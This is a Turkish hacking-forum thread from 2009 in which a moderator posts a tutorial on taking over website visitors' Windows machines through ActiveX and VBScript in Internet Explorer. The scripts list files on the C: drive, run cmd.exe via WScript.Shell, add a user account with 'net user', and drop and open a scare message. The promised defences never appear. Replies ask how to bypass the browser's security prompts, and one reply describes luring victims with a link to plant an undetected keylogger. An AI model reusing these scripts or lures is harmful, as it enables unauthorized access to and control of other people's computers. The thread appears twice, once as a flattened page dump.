ActiveX Java Applet Script Uygulamarı İle Sisteme Girme

Balamir · 09-12-2009, 15:34

Bu Günkü Konumuz Scriptler, Genel Anlamda Sisteminizi Sizin İzniniz İle Elegeçirmek İçin Kullanılan Aslen İyi Fakat Kullan Tarafindan Kötüye Kullanılan Kodları İncelyeceğiz. İlk Olarak Jsript İle Sonra Vbscript Ve Son Olarak Hta Ve Java Applet Uygumaları İle Gerek Asp Gerek Html Gerekse Php Dilleri İle İstemciye Yönelik Atack Ve Savunmaya Göz Atacağız. Şimdi İlk Olarak Jscript Kullanarak İstemci Yönelimli Bir FSO Yazıyorum...
Metin Editörünü Açıyoruz ve başlıyoruz.
Öncelikle En Önemli Olan Şey Dosyalarımızdan Başlıyoruz...
İstemcinin Dosyalarina Bakalım Nelermiş

PHP Kod:


			
<html>

<title> Wardom.Org </title>

<script language="JavaScript">

// burada kucuk buyuk harf duyarliligina dikkat edin js ciler bilir ama ben yinede uyarayım :) :;) 

var yolum = 'c:\\';

//simdi ise fso nesnesini tanımlayalim

var fso = new ActiveXObject('Scripting.FileSystemObject');

//simdi Dosyalara bakalım :)

var klsr = fso.Getfolder(yolum);

//simdi dosyalara bakalim varmi yokmu varsa sayalim, yoksa islemi bitirelim :)

for (dosyalari = new Enumerator(klsr.files); !dosyalari.atEnd();

dosyalari.moveNext())

{

var dosyalar = dosyalari.item();

document.write(dosyalar.name, "<br>" );

}

</script>

</html>

Ve Kaydedelim. Bu Scripti Çalıştırdığınızda, C Sürücüsündeki Dosyalarınıza Ulaşacaksınız. Bunu Bir Sunucu Üzerinde Yayimladiğinizdada Ayni Şekilde Ziyaretcileriniz Kendi Dosyalarina Ulaşacak. Bunlari Toplayan Bir Çok Kişi Var. Dol Belirtildikten Sonra Tüm Çerezlerinizede Ulaşmak Mumkun. Bir Çoğu Sistemin Kullanıcı Adinin Bilinmediği Sürece Nasil Yol Belirileceğini Düşünebilir. Fakat Windows Altinda %UserProfile% Tanimli Bir Değişken Gibidir. Ve Bu Direk Olarak Kullanıcı Dizinine Gider. Neyse Daha Fazla Uzatmadan Bir Kaç Basit Örnekle Devam Edip Nasil Korunulacağina Deyinelim...

Şimdi İse Kullanici Üzerinde Bir Program Çalıştıralim..
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=328831
Bunu Ise VbScript İle Yapalim.

PHP Kod:


			
<html>

<title> Wardom.Org </title>

<script language="VBScript"> 

' Hata Durumunda Devam Etmesini Belirtiyorum

On Error Resume Next

' Çalıştırılacak Olan Exenin Yolunu Belirtiyorum. Burada %SystemRoot% Kulu Olan Windows Yoludur. Ayni %UserProfile% gibi ;)

ExeYolu= "%SystemRoot%\system32\cmd.exe"

'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum

Set pcalisitir  = Createobject("Wscript.Shell")

' Ve Çalıştırma Komutunu Veriyorum 

pcalisitir.run ExeYolu

' scripti kapatiyorum :)

</script>

Bunu Ayni Şekilde ornek2.html olarak Kayit EttiğiniZ Ve Çalıştırdığınızda Cmd.exe Çalışacaktir.
Şimdi Biraz Daha İleri Giderek Komut Yolayalim ve Birşeyler Yaptiralim

/c parametresi cmd.exe den sonra komut işlemek icin kullanilir ben en basit olarak sisteme bir kullanici eklemek istiyorum ve kolaylik olsun yada Administrator sifresini değiştirelim seçim sizin

PHP Kod:


			
<html>

<title> Wardom.Org </title>

<script language="VBScript"> 

' Hata Durumunda Devam Etmesini Belirtiyorum

On Error Resume Next

' Burada %SystemRoot% Kurulu Olan windows yolu olduğunu yukarda belirttim /c parametresinden sorna geleninde komut olduğunu biliyorsunuz.bi bilmediğiniz net user /add kodyaziyorumcom ? onuda aşağida acikliyacam.

ExeYolKomut  = "%SystemRoot%\system32\cmd.exe /c net user /add kodyaziyorumcom"

'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum

Set pcalisitir  = Createobject("Wscript.Shell")

' Ve Çalıştırma Komutunu Veriyorum 

pcalisitir.run ExeYolKomut' scripti kapatiyorum :)

</script>

</html>

Evet Şuan İçin Sisteme Bir Kullanici Ekledim.Ve Dilediğim Herşeyi Bu Kullanici Adiyla Gerçekleştirebilirim Şimdi Birazcik Daha İlerlemek İstiyor Canim Gerçi Yapılacak Çok Şey Var Ama Neyse Son Bir Örnek Daha Yapalım.

PHP Kod:


			
<html>

<title> Wardom.Org</title>

<script language="VBScript"> 

' Hata Durumunda Devam Etmesini Belirtiyorum

On Error Resume Next

'  Mesajımızı Yazdiralim :)

ExeYolu = "%SystemRoot%\system32\cmd.exe /c echo Sisteminizde Ciddi Bir Açık Var. Önemsediğiniz Dosyalariniz Veya Hesap Şifreleriniz Varsa, En Yakın Sistem Uzamanına Gitmenizi Oneririm ;) > c:\MESAJINVAR.TXT"

'  Metin Editörümüzün yolunu tanımlayalim

Ac = "%SystemRoot%\system32\notepad.exe"

'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum

Set pcalisitir  = Createobject("Wscript.Shell")

' Ve Çalıştırma Komutunu Veriyorum mesajımızı yazdiriyoruz.

pcalisitir.run ExeYolu

'  Metin Editörümüz ile mesajımızı acalim :)

pcalisitir.run ac + " c:\MESAJINVAR.TXT"

</script> 

</html>

Burada Mesajıda Bıraktık Metin Editoru İlede Açtık Dilerseniz Mesaj Olarak Farklı Yollada Mesaj Verebilirsiniz Biraz Daha Geliştirerek

PHP Kod:


			
<html>

<title> Wardom.org </title>

<script language="VBScript"> 

' Hata Durumunda Devam Etmesini Belirtiyorum

On Error Resume Next

 ' denden işaretini tanımlayalim

denden = chr(34)

'  Mesajımızı Yazdiralim :)

ExeYolMesaj = "%SystemRoot%\system32\cmd.exe /c echo  MsgBox(" & denden & "Sisteminizde Ciddi Bir Acik Var. Onemsediğiniz Dosyalariniz Veya Hesap Sifreleriniz Varsa, En Yakın Sistem Uzamanına Gitmenizi Öneririm" & denden & ") >  c:\mesaj.vbs"

'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum

Set pcalisitir = Createobject("Wscript.Shell")

' Ve Çalıştırma Komutunu Veriyorum mesajımızı yazdırıyoruz.

pcalisitir.run ExeYolMesaj 

'  Scripti Çalıştıralim

pcalisitir.run  "c:\mesaj.vbs"

</script>

</html>

Buraya Kadar Anlattıklarımın iexplorer İçindi, Firefox İçin Ise Java Apletleri Kullanacağiz.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=328831
ama şimdilik bu ders icin bukadari yeterli iyi çalışmalar kolay gelsin korunmaya yolları ve diğer ayrintilar diğer derslerde. unutmadan net user /add komutunu anlatayım. net user add komutu sisteme kullanici ekler geniş bilgi için
başlat > caliştir > cmd yazıp buraya net user /? yazıp daha ayrıntılı bilgiye sahip olabilirsiniz diğer komutlarıda öğrenirsiniz hadi kolay gelsin iyi çalışmalar.

un10cked · 09-12-2009, 16:50

tesekkurler bilgileriniz icin. Internet explorer 2 defa soruyor kodu acmadan once.
Onlarıda atlamanın yolları yok mu?

Balamir · 09-12-2009, 16:55

Localde çalıştırdığınız için ActiveX kodlarını her zaman sorar hosting üzerinde sormadan açan kodlar var ama yüksek miktardaki ücretler ile satılıyor

Hx0r · 10-12-2009, 00:25

Teşekkürler Arkdaşım ..

onurxserver · 07-01-2010, 03:07

Balamir gerçekten teşekkürler,ama öncelikle PHP bilgimi ilerletsem benim için daha iyi olacak

devrimkemal · 16-02-2010, 04:05

faydalı konu diye ben buna derim

teşekkürler

siyahizm · 16-02-2010, 05:42

Çok teşekkürler.

cheRap · 20-03-2010, 12:59

tesekkurler emege saygı

Doctor Security · 26-05-2010, 00:45

Süper bir konu aslında...Bunu gerçekleştirdiğinizi düşünsenize

Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=328831

Kurbana cazip bir başlık altında ya da kişisel iletinin altında bir link veriyorsunuz o da tıklıyor ve keylogger onun bilgisayarına direkt...Birde bu antivirüslere yakalanmayan warloggersa çantada keklik...

Aslında kimsenin bilgisayarına giripte bilgilerini yada başka şeylerini ele geçirmek istemem ama bazı "klavye delikanlıları" bunu hakediyor...

EFENDİSİZ_KTSL · 01-09-2010, 14:56

teşekkürler aydalı oldu.

simulasyon · 06-09-2010, 05:57

yeni olmama rağmen süper bi paylaşım olmuş saolasın

un10cked · 10-09-2010, 10:34

Bu tip scriptler ile sistemimizde korkunc aciklar bulmak mumkun..Korunma yollarinida paylassaniz gercekten cok guzel olacak. Simdiden tesekkurler

09-12-2009, 15:34	#1
Balamir Moderator Kayıt Tarihi: Dec 2004 Üye numarası: #975 Yer: Melbourne Mesaj sayısı: 16,727 Karma etkisi: 80827 Karma: 8080319	ActiveX Java Applet Script Uygulamarı İle Sisteme Girme Bu Günkü Konumuz Scriptler, Genel Anlamda Sisteminizi Sizin İzniniz İle Elegeçirmek İçin Kullanılan Aslen İyi Fakat Kullan Tarafindan Kötüye Kullanılan Kodları İncelyeceğiz. İlk Olarak Jsript İle Sonra Vbscript Ve Son Olarak Hta Ve Java Applet Uygumaları İle Gerek Asp Gerek Html Gerekse Php Dilleri İle İstemciye Yönelik Atack Ve Savunmaya Göz Atacağız. Şimdi İlk Olarak Jscript Kullanarak İstemci Yönelimli Bir FSO Yazıyorum... Metin Editörünü Açıyoruz ve başlıyoruz. Öncelikle En Önemli Olan Şey Dosyalarımızdan Başlıyoruz... İstemcinin Dosyalarina Bakalım Nelermiş PHP Kod: <html> <title> Wardom.Org </title> <script language="JavaScript"> // burada kucuk buyuk harf duyarliligina dikkat edin js ciler bilir ama ben yinede uyarayım :) :;) var yolum = 'c:\\'; //simdi ise fso nesnesini tanımlayalim var fso = new ActiveXObject('Scripting.FileSystemObject'); //simdi Dosyalara bakalım :) var klsr = fso.Getfolder(yolum); //simdi dosyalara bakalim varmi yokmu varsa sayalim, yoksa islemi bitirelim :) for (dosyalari = new Enumerator(klsr.files); !dosyalari.atEnd(); dosyalari.moveNext()) { var dosyalar = dosyalari.item(); document.write(dosyalar.name, "<br>" ); } </script> </html> Ve Kaydedelim. Bu Scripti Çalıştırdığınızda, C Sürücüsündeki Dosyalarınıza Ulaşacaksınız. Bunu Bir Sunucu Üzerinde Yayimladiğinizdada Ayni Şekilde Ziyaretcileriniz Kendi Dosyalarina Ulaşacak. Bunlari Toplayan Bir Çok Kişi Var. Dol Belirtildikten Sonra Tüm Çerezlerinizede Ulaşmak Mumkun. Bir Çoğu Sistemin Kullanıcı Adinin Bilinmediği Sürece Nasil Yol Belirileceğini Düşünebilir. Fakat Windows Altinda %UserProfile% Tanimli Bir Değişken Gibidir. Ve Bu Direk Olarak Kullanıcı Dizinine Gider. Neyse Daha Fazla Uzatmadan Bir Kaç Basit Örnekle Devam Edip Nasil Korunulacağina Deyinelim... Şimdi İse Kullanici Üzerinde Bir Program Çalıştıralim.. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=328831 Bunu Ise VbScript İle Yapalim. PHP Kod: <html> <title> Wardom.Org </title> <script language="VBScript"> ' Hata Durumunda Devam Etmesini Belirtiyorum On Error Resume Next ' Çalıştırılacak Olan Exenin Yolunu Belirtiyorum. Burada %SystemRoot% Kulu Olan Windows Yoludur. Ayni %UserProfile% gibi ;) ExeYolu= "%SystemRoot%\system32\cmd.exe" 'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum Set pcalisitir = Createobject("Wscript.Shell") ' Ve Çalıştırma Komutunu Veriyorum pcalisitir.run ExeYolu ' scripti kapatiyorum :) </script> Bunu Ayni Şekilde ornek2.html olarak Kayit EttiğiniZ Ve Çalıştırdığınızda Cmd.exe Çalışacaktir. Şimdi Biraz Daha İleri Giderek Komut Yolayalim ve Birşeyler Yaptiralim /c parametresi cmd.exe den sonra komut işlemek icin kullanilir ben en basit olarak sisteme bir kullanici eklemek istiyorum ve kolaylik olsun yada Administrator sifresini değiştirelim seçim sizin PHP Kod: <html> <title> Wardom.Org </title> <script language="VBScript"> ' Hata Durumunda Devam Etmesini Belirtiyorum On Error Resume Next ' Burada %SystemRoot% Kurulu Olan windows yolu olduğunu yukarda belirttim /c parametresinden sorna geleninde komut olduğunu biliyorsunuz.bi bilmediğiniz net user /add kodyaziyorumcom ? onuda aşağida acikliyacam. ExeYolKomut = "%SystemRoot%\system32\cmd.exe /c net user /add kodyaziyorumcom" 'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum Set pcalisitir = Createobject("Wscript.Shell") ' Ve Çalıştırma Komutunu Veriyorum pcalisitir.run ExeYolKomut' scripti kapatiyorum :) </script> </html> Evet Şuan İçin Sisteme Bir Kullanici Ekledim.Ve Dilediğim Herşeyi Bu Kullanici Adiyla Gerçekleştirebilirim Şimdi Birazcik Daha İlerlemek İstiyor Canim Gerçi Yapılacak Çok Şey Var Ama Neyse Son Bir Örnek Daha Yapalım. PHP Kod: <html> <title> Wardom.Org</title> <script language="VBScript"> ' Hata Durumunda Devam Etmesini Belirtiyorum On Error Resume Next ' Mesajımızı Yazdiralim :) ExeYolu = "%SystemRoot%\system32\cmd.exe /c echo Sisteminizde Ciddi Bir Açık Var. Önemsediğiniz Dosyalariniz Veya Hesap Şifreleriniz Varsa, En Yakın Sistem Uzamanına Gitmenizi Oneririm ;) > c:\MESAJINVAR.TXT" ' Metin Editörümüzün yolunu tanımlayalim Ac = "%SystemRoot%\system32\notepad.exe" 'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum Set pcalisitir = Createobject("Wscript.Shell") ' Ve Çalıştırma Komutunu Veriyorum mesajımızı yazdiriyoruz. pcalisitir.run ExeYolu ' Metin Editörümüz ile mesajımızı acalim :) pcalisitir.run ac + " c:\MESAJINVAR.TXT" </script> </html> Burada Mesajıda Bıraktık Metin Editoru İlede Açtık Dilerseniz Mesaj Olarak Farklı Yollada Mesaj Verebilirsiniz Biraz Daha Geliştirerek PHP Kod: <html> <title> Wardom.org </title> <script language="VBScript"> ' Hata Durumunda Devam Etmesini Belirtiyorum On Error Resume Next ' denden işaretini tanımlayalim denden = chr(34) ' Mesajımızı Yazdiralim :) ExeYolMesaj = "%SystemRoot%\system32\cmd.exe /c echo MsgBox(" & denden & "Sisteminizde Ciddi Bir Acik Var. Onemsediğiniz Dosyalariniz Veya Hesap Sifreleriniz Varsa, En Yakın Sistem Uzamanına Gitmenizi Öneririm" & denden & ") > c:\mesaj.vbs" 'Programi Caliştiracak Olan Nesnemi Oluşturuluyorum Set pcalisitir = Createobject("Wscript.Shell") ' Ve Çalıştırma Komutunu Veriyorum mesajımızı yazdırıyoruz. pcalisitir.run ExeYolMesaj ' Scripti Çalıştıralim pcalisitir.run "c:\mesaj.vbs" </script> </html> Buraya Kadar Anlattıklarımın iexplorer İçindi, Firefox İçin Ise Java Apletleri Kullanacağiz. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=328831 ama şimdilik bu ders icin bukadari yeterli iyi çalışmalar kolay gelsin korunmaya yolları ve diğer ayrintilar diğer derslerde. unutmadan net user /add komutunu anlatayım. net user add komutu sisteme kullanici ekler geniş bilgi için başlat > caliştir > cmd yazıp buraya net user /? yazıp daha ayrıntılı bilgiye sahip olabilirsiniz diğer komutlarıda öğrenirsiniz hadi kolay gelsin iyi çalışmalar.

Konu Araçları	Bu Konuda Ara
Printer Çıktısını Göster Sayfayı Emaille Yolla	Bu Konuda Ara: Gelişmiş Arama

09-12-2009, 16:50	#2
un10cked Forum Kalfası Kayıt Tarihi: Jan 2008 Üye numarası: #189326 Yer: Australia Mesaj sayısı: 1,266 Karma etkisi: 2386 Karma: 238097	tesekkurler bilgileriniz icin. Internet explorer 2 defa soruyor kodu acmadan once. Onlarıda atlamanın yolları yok mu?

09-12-2009, 16:55	#3
Balamir Moderator Kayıt Tarihi: Dec 2004 Üye numarası: #975 Yer: Melbourne Mesaj sayısı: 16,727 Karma etkisi: 80827 Karma: 8080319	Localde çalıştırdığınız için ActiveX kodlarını her zaman sorar hosting üzerinde sormadan açan kodlar var ama yüksek miktardaki ücretler ile satılıyor

10-12-2009, 00:25	#4
Hx0r Banned Kayıt Tarihi: Dec 2009 Üye numarası: #396997 Mesaj sayısı: 3 Karma etkisi: 0 Karma: -12070	Teşekkürler Arkdaşım ..

07-01-2010, 03:07	#5
onurxserver Cool Üye Kayıt Tarihi: May 2006 Üye numarası: #67745 Mesaj sayısı: 241 Karma etkisi: 194 Karma: 18850	Balamir gerçekten teşekkürler,ama öncelikle PHP bilgimi ilerletsem benim için daha iyi olacak

16-02-2010, 04:05	#6
devrimkemal Daimi Üye Kayıt Tarihi: Jul 2009 Üye numarası: #352494 Yer: Aydın/İzmir/İstanbul Mesaj sayısı: 643 Karma etkisi: 8011 Karma: 800847	faydalı konu diye ben buna derim teşekkürler

16-02-2010, 05:42	#7
siyahizm Forum Kalfası Kayıt Tarihi: Oct 2008 Üye numarası: #268849 Yer: türkiye Mesaj sayısı: 1,417 Karma etkisi: 9149 Karma: 914468	Çok teşekkürler.

20-03-2010, 12:59	#8
cheRap Daimi Üye Kayıt Tarihi: Jan 2010 Üye numarası: #406491 Yer: imdeyim Mesaj sayısı: 274 Karma etkisi: 800 Karma: 79745	tesekkurler emege saygı

26-05-2010, 00:45	#9
Doctor Security Forum Kalfası Kayıt Tarihi: May 2009 Üye numarası: #332524 Mesaj sayısı: 958 Karma etkisi: 4971 Karma: 496827	Süper bir konu aslında...Bunu gerçekleştirdiğinizi düşünsenize Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=328831 Kurbana cazip bir başlık altında ya da kişisel iletinin altında bir link veriyorsunuz o da tıklıyor ve keylogger onun bilgisayarına direkt...Birde bu antivirüslere yakalanmayan warloggersa çantada keklik... Aslında kimsenin bilgisayarına giripte bilgilerini yada başka şeylerini ele geçirmek istemem ama bazı "klavye delikanlıları" bunu hakediyor...

01-09-2010, 14:56	#10
EFENDİSİZ_KTSL Cool Çırak Kayıt Tarihi: Aug 2010 Üye numarası: #470893 Mesaj sayısı: 39 Karma etkisi: 0 Karma: 10	teşekkürler aydalı oldu.

06-09-2010, 05:57	#11
simulasyon Çırak Kayıt Tarihi: Sep 2010 Üye numarası: #480851 Mesaj sayısı: 11 Karma etkisi: 0 Karma: 10	yeni olmama rağmen süper bi paylaşım olmuş saolasın

10-09-2010, 10:34	#12
un10cked Forum Kalfası Kayıt Tarihi: Jan 2008 Üye numarası: #189326 Yer: Australia Mesaj sayısı: 1,266 Karma etkisi: 2386 Karma: 238097	Bu tip scriptler ile sistemimizde korkunc aciklar bulmak mumkun..Korunma yollarinida paylassaniz gercekten cok guzel olacak. Simdiden tesekkurler